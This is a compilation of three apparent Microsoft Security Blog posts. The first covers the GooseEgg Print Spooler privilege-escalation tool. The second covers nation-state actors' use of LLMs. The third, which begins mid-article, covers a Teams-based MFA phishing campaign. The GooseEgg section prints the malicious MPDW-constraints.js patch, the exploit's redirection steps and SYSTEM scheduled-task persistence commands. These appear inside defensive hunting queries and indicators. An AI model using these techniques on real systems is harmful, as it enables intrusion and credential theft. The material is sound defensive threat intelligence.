Forest Blizzard often uses publicly available exploits in addition to CVE-2022-38028, such as CVE-2023-23397. Linked to the Russian General Staff Main Intelligence Directorate (GRU) by the United States and United Kingdom governments, Forest Blizzard primarily focuses on strategic intelligence targets and differs from other GRU-affiliated and sponsored groups, which Microsoft has tied to destructive attacks, such as Seashell Blizzard (IRIDIUM) and Cadet Blizzard (DEV-0586). Although Russian threat actors are known to have exploited a set of similar vulnerabilities known as PrintNightmare (CVE-2021-34527 and CVE-2021-1675), the use of GooseEgg in Forest Blizzard operations is a unique discovery that had not been previously reported by security providers. Microsoft is committed to providing visibility into observed malicious activity and sharing insights on threat actors to help organizations protect themselves. Organizations and users are to apply the CVE-2022-38028 security update to mitigate this threat, while Microsoft Defender Antivirus detects the specific Forest Blizzard capability as HackTool:Win64/GooseEgg.

This blog provides technical information on GooseEgg, a unique Forest Blizzard capability. In addition to patching, this blog details several steps users can take to defend themselves against attempts to exploit Print Spooler vulnerabilities. We also provide additional recommendations, detections, and indicators of compromise. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the necessary information to secure their accounts.

Who is Forest Blizzard?

Forest Blizzard primarily targets government, energy, transportation, and non-governmental organizations in the United States, Europe, and the Middle East. Microsoft has also observed Forest Blizzard targeting media, information technology, sports organizations, and educational institutions worldwide. Since at least 2010, the threat actor’s primary mission has been to collect intelligence in support of Russian government foreign policy initiatives. The United States and United Kingdom governments have linked Forest Blizzard to Unit 26165 of the Russian Federation’s military intelligence agency, the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). Other security researchers have used GRU Unit 26165, APT28, Sednit, Sofacy, and Fancy Bear to refer to groups with similar or related activities.

GooseEgg

Microsoft Threat Intelligence assesses Forest Blizzard’s objective in deploying GooseEgg is to gain elevated access to target systems and steal credentials and information. While this actor’s TTPs and infrastructure specific to the use of this tool can change at any time, the following sections provide additional details on Forest Blizzard tactics, techniques, and procedures (TTPs) in past compromises.

Launch, persistence, and privilege escalation

Microsoft has observed that, after obtaining access to a target device, Forest Blizzard uses GooseEgg to elevate privileges within the environment. GooseEgg is typically deployed with a batch script, which we have observed using the name execute.bat and doit.bat. This batch script writes the file servtask.bat, which contains commands for saving off/compressing registry hives. The batch script invokes the paired GooseEgg executable and sets up persistence as a scheduled task designed to run servtask.bat.

The GooseEgg binary—which has included but is not limited to the file names justice.exe and DefragmentSrv.exe—takes one of four commands, each with different run paths. While the binary appears to launch a trivial given command, in fact the binary does this in a unique and sophisticated manner, likely to help conceal the activity.

The first command issues a custom return code 0x6009F49F and exits; which could be indicative of a version number. The next two commands trigger the exploit and launch either a provided dynamic-link library (DLL) or executable with elevated permissions. The fourth and final command tests the exploit and checks that it has succeeded using the whoami command.

Microsoft has observed that the name of an embedded malicious DLL file typically includes the phrase “wayzgoose”; for example, wayzgoose23.dll. This DLL, as well as other components of the malware, are deployed to one of the following installation subdirectories, which is created under C:\ProgramData. A subdirectory name is selected from the list below:

• Microsoft
• Adobe
• Comms
• Intel
• Kaspersky Lab
• Bitdefender
• ESET
• NVIDIA
• UbiSoft
• Steam

A specially crafted subdirectory with randomly generated numbers and the format string \v%u.%02u.%04u is also created and serves as the install directory. For example, a directory that looks like C:\ProgramData\Adobe\v2.116.4405 may be created. The binary then copies the following driver stores to this directory:

• C:\Windows\System32\DriverStore\FileRepository\pnms003.inf_*
• C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_*

Next, registry keys are created, effectively generating a custom protocol handler and registering a new CLSID to serve as the COM server for this “rogue” protocol. The exploit replaces the C: drive symbolic link in the object manager to point to the newly created directory. When the PrintSpooler attempts to load C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_amd64_a7412a554c9bc1fd\MPDW-Constraints.js, it instead is redirected to the actor-controlled directory containing the copied driver packages.

The “MPDW-constraints.js” stored within the actor-controlled directory has the following patch applied to the convertDevModeToPrintTicket function:

function convertDevModeToPrintTicket(devModeProperties, scriptContext, printTicket)
{try{ printTicket.XmlNode.load('rogue9471://go'); } catch (e) {}

The above patch to the convertDevModeToPrintTicket function invokes the “rogue” search protocol handler’s CLSID during the call to RpcEndDocPrinter. This results in the auxiliary DLL wayzgoose.dll launching in the context of the PrintSpooler service with SYSTEM permissions. wayzgoose.dll is a basic launcher application capable of spawning other applications specified at the command line with SYSTEM-level permissions, enabling threat actors to perform other malicious activities such as installing a backdoor, moving laterally through compromised networks, and remotely executing code.

Recommendations

Microsoft recommends the following mitigations defend against attacks that use GooseEgg.

Reduce the Print Spooler vulnerability

Microsoft released a security update for the Print Spooler vulnerability exploited by GooseEgg on October 11, 2022 and updates for PrintNightmare vulnerabilities on June 8, 2021 and July 1, 2021. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security. In addition, since the Print Spooler service isn’t required for domain controller operations, Microsoft recommends disabling the service on domain controllers. Otherwise, users can install available Windows security updates for Print Spooler vulnerabilities on Windows domain controllers before member servers and workstations. To help identify domain controllers that have the Print Spooler service enabled, Microsoft Defender for Identity has a built-in security assessment that tracks the availability of Print Spooler services on domain controllers.

Be proactively defensive

• For customers, follow the credential hardening recommendations in our on-premises credential theft overview to defend against common credential theft techniques like LSASS access.
• Run Endpoint Detection and Response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.    
• Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. 
• Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.

Microsoft Defender XDR customers can turn on the following attack surface reduction rule to prevent common attack techniques used for GooseEgg. Microsoft Defender XDR detects the GooseEgg tool and raises an alert upon detection of attempts to exploit Print Spooler vulnerabilities regardless of whether the device has been patched.

•  Block credential stealing from the Windows local security authority subsystem (lsass.exe)

Detecting, hunting, and responding to GooseEgg

Microsoft Defender XDR detections

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

• HackTool:Win64/GooseEgg

Microsoft Defender for Endpoint

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

• Possible exploitation of CVE-2021-34527
• Possible source of PrintNightmare exploitation
• Possible target of PrintNightmare exploitation attempt
• Potential elevation of privilege using print filter pipeline service
• Suspicious behavior by spoolsv.exe
• Forest Blizzard Actor activity detected

Microsoft Defender for Identity

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

• Suspected Windows Print Spooler service exploitation attempt (CVE-2021-34527 exploitation)

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

• Actor Profile: Forest Blizzard
• Abuse of Windows Print Spooler for privilege escalation and persistence

Hunting queries

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here:  https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.

Hunt for filenames, file extensions in ProgramData folder and file hash

let filenames = dynamic(["execute.bat","doit.bat","servtask.bat"]);
DeviceFileEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "FileCreated"
  | where FolderPath == "C:\\ProgramData\\"
  | where FileName in~ (filenames) or FileName endswith ".save" or FileName endswith ".zip" or ( FileName startswith "wayzgoose" and FileName endswith ".dll") or SHA256 == "7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9" // hash value of execute.bat/doit.bat/servtask.bat
  | project TimeGenerated, DeviceId, DeviceName, ActionType, FolderPath, FileName, InitiatingProcessAccountName,InitiatingProcessAccountUpn

Hunt for processes creating scheduled task creation

DeviceProcessEvents
| where TimeGenerated > ago(60d) // change the duration according to your requirement
| where InitiatingProcessSHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" //hash value of justice.exe
or InitiatingProcessSHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" or SHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" //hash value of DefragmentSrv.exe
or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE" or
   ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE" or
   ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE" or
   ProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv" or
   InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE" or
   InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE" or
   InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE" or
   InitiatingProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv"
| project TimeGenerated, AccountName,AccountUpn,ActionType, DeviceId, DeviceName,FolderPath, FileName

Hunt for JavaScript constrained file

DeviceFileEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "FileCreated"
  | where FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\"
  | where FileName endswith ".js" or FileName == "MPDW-constraints.js"

Hunt for creation of registry key / value events

DeviceRegistryEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "RegistryValueSet"
  | where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server"
  | where RegistryValueName has "(Default)"
  | where RegistryValueData has "wayzgoose.dll" or RegistryValueData contains ".dll"

 Hunt for custom protocol handler

DeviceRegistryEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "RegistryValueSet"
  | where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\PROTOCOLS\\Handler\\rogue"
  | where RegistryValueName has "CLSID"
  | where RegistryValueData contains "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}"

Indicators of compromise

Batch script artifacts:

• execute.bat
• doit.bat
• servtask.bat
• 7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9

GooseEgg artifacts:

• justice.pdb
• wayzgoose.pdb

References

• https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675
• https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-074a

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials appeared first on Microsoft Security Blog.

The objective of Microsoft’s partnership with OpenAI, including the release of this research, is to ensure the safe and responsible use of AI technologies like ChatGPT, upholding the highest standards of ethical application to protect the community from potential misuse. As part of this commitment, we have taken measures to disrupt assets and accounts associated with threat actors, improve the protection of OpenAI LLM technology and users from attack or abuse, and shape the guardrails and safety mechanisms around our models. In addition, we are also deeply committed to using generative AI to disrupt threat actors and leverage the power of new tools, including Microsoft Copilot for Security, to elevate defenders everywhere.

A principled approach to detecting and blocking threat actors

The progress of technology creates a demand for strong cybersecurity and safety measures. For example, the White House’s Executive Order on AI requires rigorous safety testing and government supervision for AI systems that have major impacts on national and economic security or public health and safety. Our actions enhancing the safeguards of our AI models and partnering with our ecosystem on the safe creation, implementation, and use of these models align with the Executive Order’s request for comprehensive AI safety and security standards.

In line with Microsoft’s leadership across AI and cybersecurity, today we are announcing principles shaping Microsoft’s policy and actions mitigating the risks associated with the use of our AI tools and APIs by nation-state advanced persistent threats (APTs), advanced persistent manipulators (APMs), and cybercriminal syndicates we track.

These principles include:   

• Identification and action against malicious threat actors’ use: Upon detection of the use of any Microsoft AI application programming interfaces (APIs), services, or systems by an identified malicious threat actor, including nation-state APT or APM, or the cybercrime syndicates we track, Microsoft will take appropriate action to disrupt their activities, such as disabling the accounts used, terminating services, or limiting access to resources.           

• Notification to other AI service providers: When we detect a threat actor’s use of another service provider’s AI, AI APIs, services, and/or systems, Microsoft will promptly notify the service provider and share relevant data. This enables the service provider to independently verify our findings and take action in accordance with their own policies.

• Collaboration with other stakeholders: Microsoft will collaborate with other stakeholders to regularly exchange information about detected threat actors’ use of AI. This collaboration aims to promote collective, consistent, and effective responses to ecosystem-wide risks.

• Transparency: As part of our ongoing efforts to advance responsible use of AI, Microsoft will inform the public and stakeholders about actions taken under these threat actor principles, including the nature and extent of threat actors’ use of AI detected within our systems and the measures taken against them, as appropriate.

Microsoft remains committed to responsible AI innovation, prioritizing the safety and integrity of our technologies with respect for human rights and ethical standards. These principles announced today build on Microsoft’s Responsible AI practices, our voluntary commitments to advance responsible AI innovation and the Azure OpenAI Code of Conduct. We are following these principles as part of our broader commitments to strengthening international law and norms and to advance the goals of the Bletchley Declaration endorsed by 29 countries.

Microsoft and OpenAI’s complementary defenses protect AI platforms

Because Microsoft and OpenAI’s partnership extends to security, the companies can take action when known and emerging threat actors surface. Microsoft Threat Intelligence tracks more than 300 unique threat actors, including 160 nation-state actors, 50 ransomware groups, and many others. These adversaries employ various digital identities and attack infrastructures. Microsoft’s experts and automated systems continually analyze and correlate these attributes, uncovering attackers’ efforts to evade detection or expand their capabilities by leveraging new technologies. Consistent with preventing threat actors’ actions across our technologies and working closely with partners, Microsoft continues to study threat actors’ use of AI and LLMs, partner with OpenAI to monitor attack activity, and apply what we learn to continually improve defenses. This blog provides an overview of observed activities collected from known threat actor infrastructure as identified by Microsoft Threat Intelligence, then shared with OpenAI to identify potential malicious use or abuse of their platform and protect our mutual customers from future threats or harm.

Recognizing the rapid growth of AI and emergent use of LLMs in cyber operations, we continue to work with MITRE to integrate these LLM-themed tactics, techniques, and procedures (TTPs) into the MITRE ATT&CK® framework or MITRE ATLAS™ (Adversarial Threat Landscape for Artificial-Intelligence Systems) knowledgebase. This strategic expansion reflects a commitment to not only track and neutralize threats, but also to pioneer the development of countermeasures in the evolving landscape of AI-powered cyber operations. A full list of the LLM-themed TTPs, which include those we identified during our investigations, is summarized in the appendix.

Summary of Microsoft and OpenAI’s findings and threat intelligence

The threat ecosystem over the last several years has revealed a consistent theme of threat actors following trends in technology in parallel with their defender counterparts. Threat actors, like defenders, are looking at AI, including LLMs, to enhance their productivity and take advantage of accessible platforms that could advance their objectives and attack techniques. Cybercrime groups, nation-state threat actors, and other adversaries are exploring and testing different AI technologies as they emerge, in an attempt to understand potential value to their operations and the security controls they may need to circumvent. On the defender side, hardening these same security controls from attacks and implementing equally sophisticated monitoring that anticipates and blocks malicious activity is vital.

While different threat actors’ motives and complexity vary, they have common tasks to perform in the course of targeting and attacks. These include reconnaissance, such as learning about potential victims’ industries, locations, and relationships; help with coding, including improving things like software scripts and malware development; and assistance with learning and using native languages. Language support is a natural feature of LLMs and is attractive for threat actors with continuous focus on social engineering and other techniques relying on false, deceptive communications tailored to their targets’ jobs, professional networks, and other relationships.

Importantly, our research with OpenAI has not identified significant attacks employing the LLMs we monitor closely. At the same time, we feel this is important research to publish to expose early-stage, incremental moves that we observe well-known threat actors attempting, and share information on how we are blocking and countering them with the defender community.

While attackers will remain interested in AI and probe technologies’ current capabilities and security controls, it’s important to keep these risks in context. As always, hygiene practices such as multifactor authentication (MFA) and Zero Trust defenses are essential because attackers may use AI-based tools to improve their existing cyberattacks that rely on social engineering and finding unsecured devices and accounts.

The threat actors profiled below are a sample of observed activity we believe best represents the TTPs the industry will need to better track using MITRE ATT&CK® framework or MITRE ATLAS™ knowledgebase updates.

Forest Blizzard 

Forest Blizzard (STRONTIUM) is a Russian military intelligence actor linked to GRU Unit 26165, who has targeted victims of both tactical and strategic interest to the Russian government. Their activities span across a variety of sectors including defense, transportation/logistics, government, energy, non-governmental organizations (NGO), and information technology. Forest Blizzard has been extremely active in targeting organizations in and related to Russia’s war in Ukraine throughout the duration of the conflict, and Microsoft assesses that Forest Blizzard operations play a significant supporting role to Russia’s foreign policy and military objectives both in Ukraine and in the broader international community. Forest Blizzard overlaps with the threat actor tracked by other researchers as APT28 and Fancy Bear.

Forest Blizzard’s use of LLMs has involved research into various satellite and radar technologies that may pertain to conventional military operations in Ukraine, as well as generic research aimed at supporting their cyber operations. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-informed reconnaissance: Interacting with LLMs to understand satellite communication protocols, radar imaging technologies, and specific technical parameters. These queries suggest an attempt to acquire in-depth knowledge of satellite capabilities.
• LLM-enhanced scripting techniques: Seeking assistance in basic scripting tasks, including file manipulation, data selection, regular expressions, and multiprocessing, to potentially automate or optimize technical operations.

Microsoft observed engagement from Forest Blizzard that were representative of an adversary exploring the use cases of a new technology. All accounts and assets associated with Forest Blizzard have been disabled.

Emerald Sleet

Emerald Sleet (THALLIUM) is a North Korean threat actor that has remained highly active throughout 2023. Their recent operations relied on spear-phishing emails to compromise and gather intelligence from prominent individuals with expertise on North Korea. Microsoft observed Emerald Sleet impersonating reputable academic institutions and NGOs to lure victims into replying with expert insights and commentary about foreign policies related to North Korea. Emerald Sleet overlaps with threat actors tracked by other researchers as Kimsuky and Velvet Chollima.

Emerald Sleet’s use of LLMs has been in support of this activity and involved research into think tanks and experts on North Korea, as well as the generation of content likely to be used in spear-phishing campaigns. Emerald Sleet also interacted with LLMs to understand publicly known vulnerabilities, to troubleshoot technical issues, and for assistance with using various web technologies. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-assisted vulnerability research: Interacting with LLMs to better understand publicly reported vulnerabilities, such as the CVE-2022-30190 Microsoft Support Diagnostic Tool (MSDT) vulnerability (known as “Follina”).
• LLM-enhanced scripting techniques: Using LLMs for basic scripting tasks such as programmatically identifying certain user events on a system and seeking assistance with troubleshooting and understanding various web technologies.
• LLM-supported social engineering: Using LLMs for assistance with the drafting and generation of content that would likely be for use in spear-phishing campaigns against individuals with regional expertise.
• LLM-informed reconnaissance: Interacting with LLMs to identify think tanks, government organizations, or experts on North Korea that have a focus on defense issues or North Korea’s nuclear weapon’s program.

All accounts and assets associated with Emerald Sleet have been disabled.

Crimson Sandstorm

Crimson Sandstorm (CURIUM) is an Iranian threat actor assessed to be connected to the Islamic Revolutionary Guard Corps (IRGC). Active since at least 2017, Crimson Sandstorm has targeted multiple sectors, including defense, maritime shipping, transportation, healthcare, and technology. These operations have frequently relied on watering hole attacks and social engineering to deliver custom .NET malware. Prior research also identified custom Crimson Sandstorm malware using email-based command-and-control (C2) channels. Crimson Sandstorm overlaps with the threat actor tracked by other researchers as Tortoiseshell, Imperial Kitten, and Yellow Liderc.

The use of LLMs by Crimson Sandstorm has reflected the broader behaviors that the security community has observed from this threat actor. Interactions have involved requests for support around social engineering, assistance in troubleshooting errors, .NET development, and ways in which an attacker might evade detection when on a compromised machine. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-supported social engineering: Interacting with LLMs to generate various phishing emails, including one pretending to come from an international development agency and another attempting to lure prominent feminists to an attacker-built website on feminism. 
• LLM-enhanced scripting techniques: Using LLMs to generate code snippets that appear intended to support app and web development, interactions with remote servers, web scraping, executing tasks when users sign in, and sending information from a system via email.
• LLM-enhanced anomaly detection evasion: Attempting to use LLMs for assistance in developing code to evade detection, to learn how to disable antivirus via registry or Windows policies, and to delete files in a directory after an application has been closed.

All accounts and assets associated with Crimson Sandstorm have been disabled.

Charcoal Typhoon

Charcoal Typhoon (CHROMIUM) is a Chinese state-affiliated threat actor with a broad operational scope. They are known for targeting sectors that include government, higher education, communications infrastructure, oil & gas, and information technology. Their activities have predominantly focused on entities within Taiwan, Thailand, Mongolia, Malaysia, France, and Nepal, with observed interests extending to institutions and individuals globally who oppose China’s policies. Charcoal Typhoon overlaps with the threat actor tracked by other researchers as Aquatic Panda, ControlX, RedHotel, and BRONZE UNIVERSITY.

In recent operations, Charcoal Typhoon has been observed interacting with LLMs in ways that suggest a limited exploration of how LLMs can augment their technical operations. This has consisted of using LLMs to support tooling development, scripting, understanding various commodity cybersecurity tools, and for generating content that could be used to social engineer targets. Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-informed reconnaissance: Engaging LLMs to research and understand specific technologies, platforms, and vulnerabilities, indicative of preliminary information-gathering stages.
• LLM-enhanced scripting techniques: Utilizing LLMs to generate and refine scripts, potentially to streamline and automate complex cyber tasks and operations.
• LLM-supported social engineering: Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
• LLM-refined operational command techniques: Utilizing LLMs for advanced commands, deeper system access, and control representative of post-compromise behavior.

All associated accounts and assets of Charcoal Typhoon have been disabled, reaffirming our commitment to safeguarding against the misuse of AI technologies.

Salmon Typhoon

Salmon Typhoon (SODIUM) is a sophisticated Chinese state-affiliated threat actor with a history of targeting US defense contractors, government agencies, and entities within the cryptographic technology sector. This threat actor has demonstrated its capabilities through the deployment of malware, such as Win32/Wkysol, to maintain remote access to compromised systems. With over a decade of operations marked by intermittent periods of dormancy and resurgence, Salmon Typhoon has recently shown renewed activity. Salmon Typhoon overlaps with the threat actor tracked by other researchers as APT4 and Maverick Panda.

Notably, Salmon Typhoon’s interactions with LLMs throughout 2023 appear exploratory and suggest that this threat actor is evaluating the effectiveness of LLMs in sourcing information on potentially sensitive topics, high profile individuals, regional geopolitics, US influence, and internal affairs. This tentative engagement with LLMs could reflect both a broadening of their intelligence-gathering toolkit and an experimental phase in assessing the capabilities of emerging technologies.

Based on these observations, we map and classify these TTPs using the following descriptions:

• LLM-informed reconnaissance: Engaging LLMs for queries on a diverse array of subjects, such as global intelligence agencies, domestic concerns, notable individuals, cybersecurity matters, topics of strategic interest, and various threat actors. These interactions mirror the use of a search engine for public domain research.
• LLM-enhanced scripting techniques: Using LLMs to identify and resolve coding errors. Requests for support in developing code with potential malicious intent were observed by Microsoft, and it was noted that the model adhered to established ethical guidelines, declining to provide such assistance.
• LLM-refined operational command techniques: Demonstrating an interest in specific file types and concealment tactics within operating systems, indicative of an effort to refine operational command execution.
• LLM-aided technical translation and explanation: Leveraging LLMs for the translation of computing terms and technical papers.

Salmon Typhoon’s engagement with LLMs aligns with patterns observed by Microsoft, reflecting traditional behaviors in a new technological arena. In response, all accounts and assets associated with Salmon Typhoon have been disabled.

In closing, AI technologies will continue to evolve and be studied by various threat actors. Microsoft will continue to track threat actors and malicious activity misusing LLMs, and work with OpenAI and other partners to share intelligence, improve protections for customers and aid the broader security community.

Appendix: LLM-themed TTPs

Using insights from our analysis above, as well as other potential misuse of AI, we’re sharing the below list of LLM-themed TTPs that we map and classify to the MITRE ATT&CK® framework or MITRE ATLAS™ knowledgebase to equip the community with a common taxonomy to collectively track malicious use of LLMs and create countermeasures against:

• LLM-informed reconnaissance: Employing LLMs to gather actionable intelligence on technologies and potential vulnerabilities.
• LLM-enhanced scripting techniques: Utilizing LLMs to generate or refine scripts that could be used in cyberattacks, or for basic scripting tasks such as programmatically identifying certain user events on a system and assistance with troubleshooting and understanding various web technologies.
• LLM-aided development: Utilizing LLMs in the development lifecycle of tools and programs, including those with malicious intent, such as malware.
• LLM-supported social engineering: Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
• LLM-assisted vulnerability research: Using LLMs to understand and identify potential vulnerabilities in software and systems, which could be targeted for exploitation.
• LLM-optimized payload crafting: Using LLMs to assist in creating and refining payloads for deployment in cyberattacks.
• LLM-enhanced anomaly detection evasion: Leveraging LLMs to develop methods that help malicious activities blend in with normal behavior or traffic to evade detection systems.
• LLM-directed security feature bypass: Using LLMs to find ways to circumvent security features, such as two-factor authentication, CAPTCHA, or other access controls.
• LLM-advised resource development: Using LLMs in tool development, tool modifications, and strategic operational planning.

Learn more

Read the sixth edition of Cyber Signals, spotlighting how we are protecting AI platforms from emerging threats related to nation-state cyberthreat actors: Navigating cyberthreats and strengthening defenses in the era of AI.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Staying ahead of threat actors in the age of AI appeared first on Microsoft Security Blog.

Our current investigation indicates this campaign has affected fewer than 40 unique global organizations. The organizations targeted in this activity likely indicate specific espionage objectives by Midnight Blizzard directed at government, non-government organizations (NGOs), IT services, technology, discrete manufacturing, and media sectors. Microsoft has mitigated the actor from using the domains and continues to investigate this activity and work to remediate the impact of the attack. As with any observed nation-state actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information needed to secure their environments.

Midnight Blizzard (NOBELIUM) is a Russia-based threat actor attributed by the US and UK governments as the Foreign Intelligence Service of the Russian Federation, also known as the SVR. This threat actor is known to primarily target governments, diplomatic entities, non-government organizations (NGOs), and IT service providers primarily in the US and Europe. Their focus is to collect intelligence through longstanding and dedicated espionage of foreign interests that can be traced to early 2018. Their operations often involve compromise of valid accounts and, in some highly targeted cases, advanced techniques to compromise authentication mechanisms within an organization to expand access and evade detection.

Midnight Blizzard is consistent and persistent in their operational targeting, and their objectives rarely change. They utilize diverse initial access methods ranging from stolen credentials to supply chain attacks, exploitation of on-premises environments to laterally move to the cloud, exploitation of service providers’ trust chain to gain access to downstream customers, as well as the Active Directory Federation Service (AD FS) malware known as FOGGYWEB and MAGICWEB. Midnight Blizzard (NOBELIUM) is tracked by partner security vendors as APT29, UNC2452, and Cozy Bear.

Midnight Blizzard’s latest credential phishing attack

Midnight Blizzard regularly utilizes token theft techniques for initial access into targeted environments, in addition to authentication spear-phishing, password spray, brute force, and other credential attacks. The attack pattern observed in malicious activity since at least late May 2023 has been identified as a subset of broader credential attack campaigns that we attribute to Midnight Blizzard.

Use of security-themed domain names in lures

To facilitate their attack, the actor uses Microsoft 365 tenants owned by small businesses they have compromised in previous attacks to host and launch their social engineering attack. The actor renames the compromised tenant, adds a new onmicrosoft.com subdomain, then adds a new user associated with that domain from which to send the outbound message to the target tenant. The actor uses security-themed or product name-themed keywords to create a new subdomain and new tenant name to lend legitimacy to the messages. These precursory attacks to compromise legitimate Azure tenants and the use of homoglyph domain names in social engineering lures are part of our ongoing investigation. Microsoft has mitigated the actor from using the domains.

Social engineering attack chain

In this activity, Midnight Blizzard either has obtained valid account credentials for the users they are targeting, or they are targeting users with passwordless authentication configured on their account – both of which require the user to enter a code that is displayed during the authentication flow into the prompt on the Microsoft Authenticator app on their mobile device.

After attempting to authenticate to an account where this form of MFA is required, the actor is presented with a code that the user would need to enter in their authenticator app. The user receives the prompt for code entry on their device. The actor then sends a message to the targeted user over Microsoft Teams eliciting the user to enter the code into the prompt on their device.

Step 1: Teams request to chat

The target user may receive a Microsoft Teams message request from an external user masquerading as a technical support or security team.

Step 2: Request authentication app action

If the target user accepts the message request, the user then receives a Microsoft Teams message from the attacker attempting to convince them to enter a code into the Microsoft Authenticator app on their mobile device.

Step 3: Successful MFA authentication

If the targeted user accepts the message request and enters the code into the Microsoft Authenticator app, the threat actor is granted a token to authenticate as the targeted user. The actor gains access to the user’s Microsoft 365 account, having completed the authentication flow.

The actor then proceeds to conduct post-compromise activity, which typically involves information theft from the compromised Microsoft 365 tenant. In some cases, the actor attempts to add a device to the organization as a managed device via Microsoft Entra ID (formerly Azure Active Directory), likely an attempt to circumvent conditional access policies configured to restrict access to specific resources to managed devices only.

Recommendations

Microsoft recommends the following mitigations to reduce the risk of this threat.

• Pilot and start deploying phishing-resistant authentication methods for users.
• Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
• Apply security best practices for Microsoft Teams. Refer to the security guide for Microsoft Teams.
  • Understand and select the best access settings for external collaboration for your organization.
  • Specify trusted Microsoft 365 organizations to define which external domains are allowed or blocked to chat and meet.
• Keep Microsoft 365 auditing enabled so that audit records could be investigated if required.
• Allow only known devices that adhere to Microsoft’s recommended security baselines.
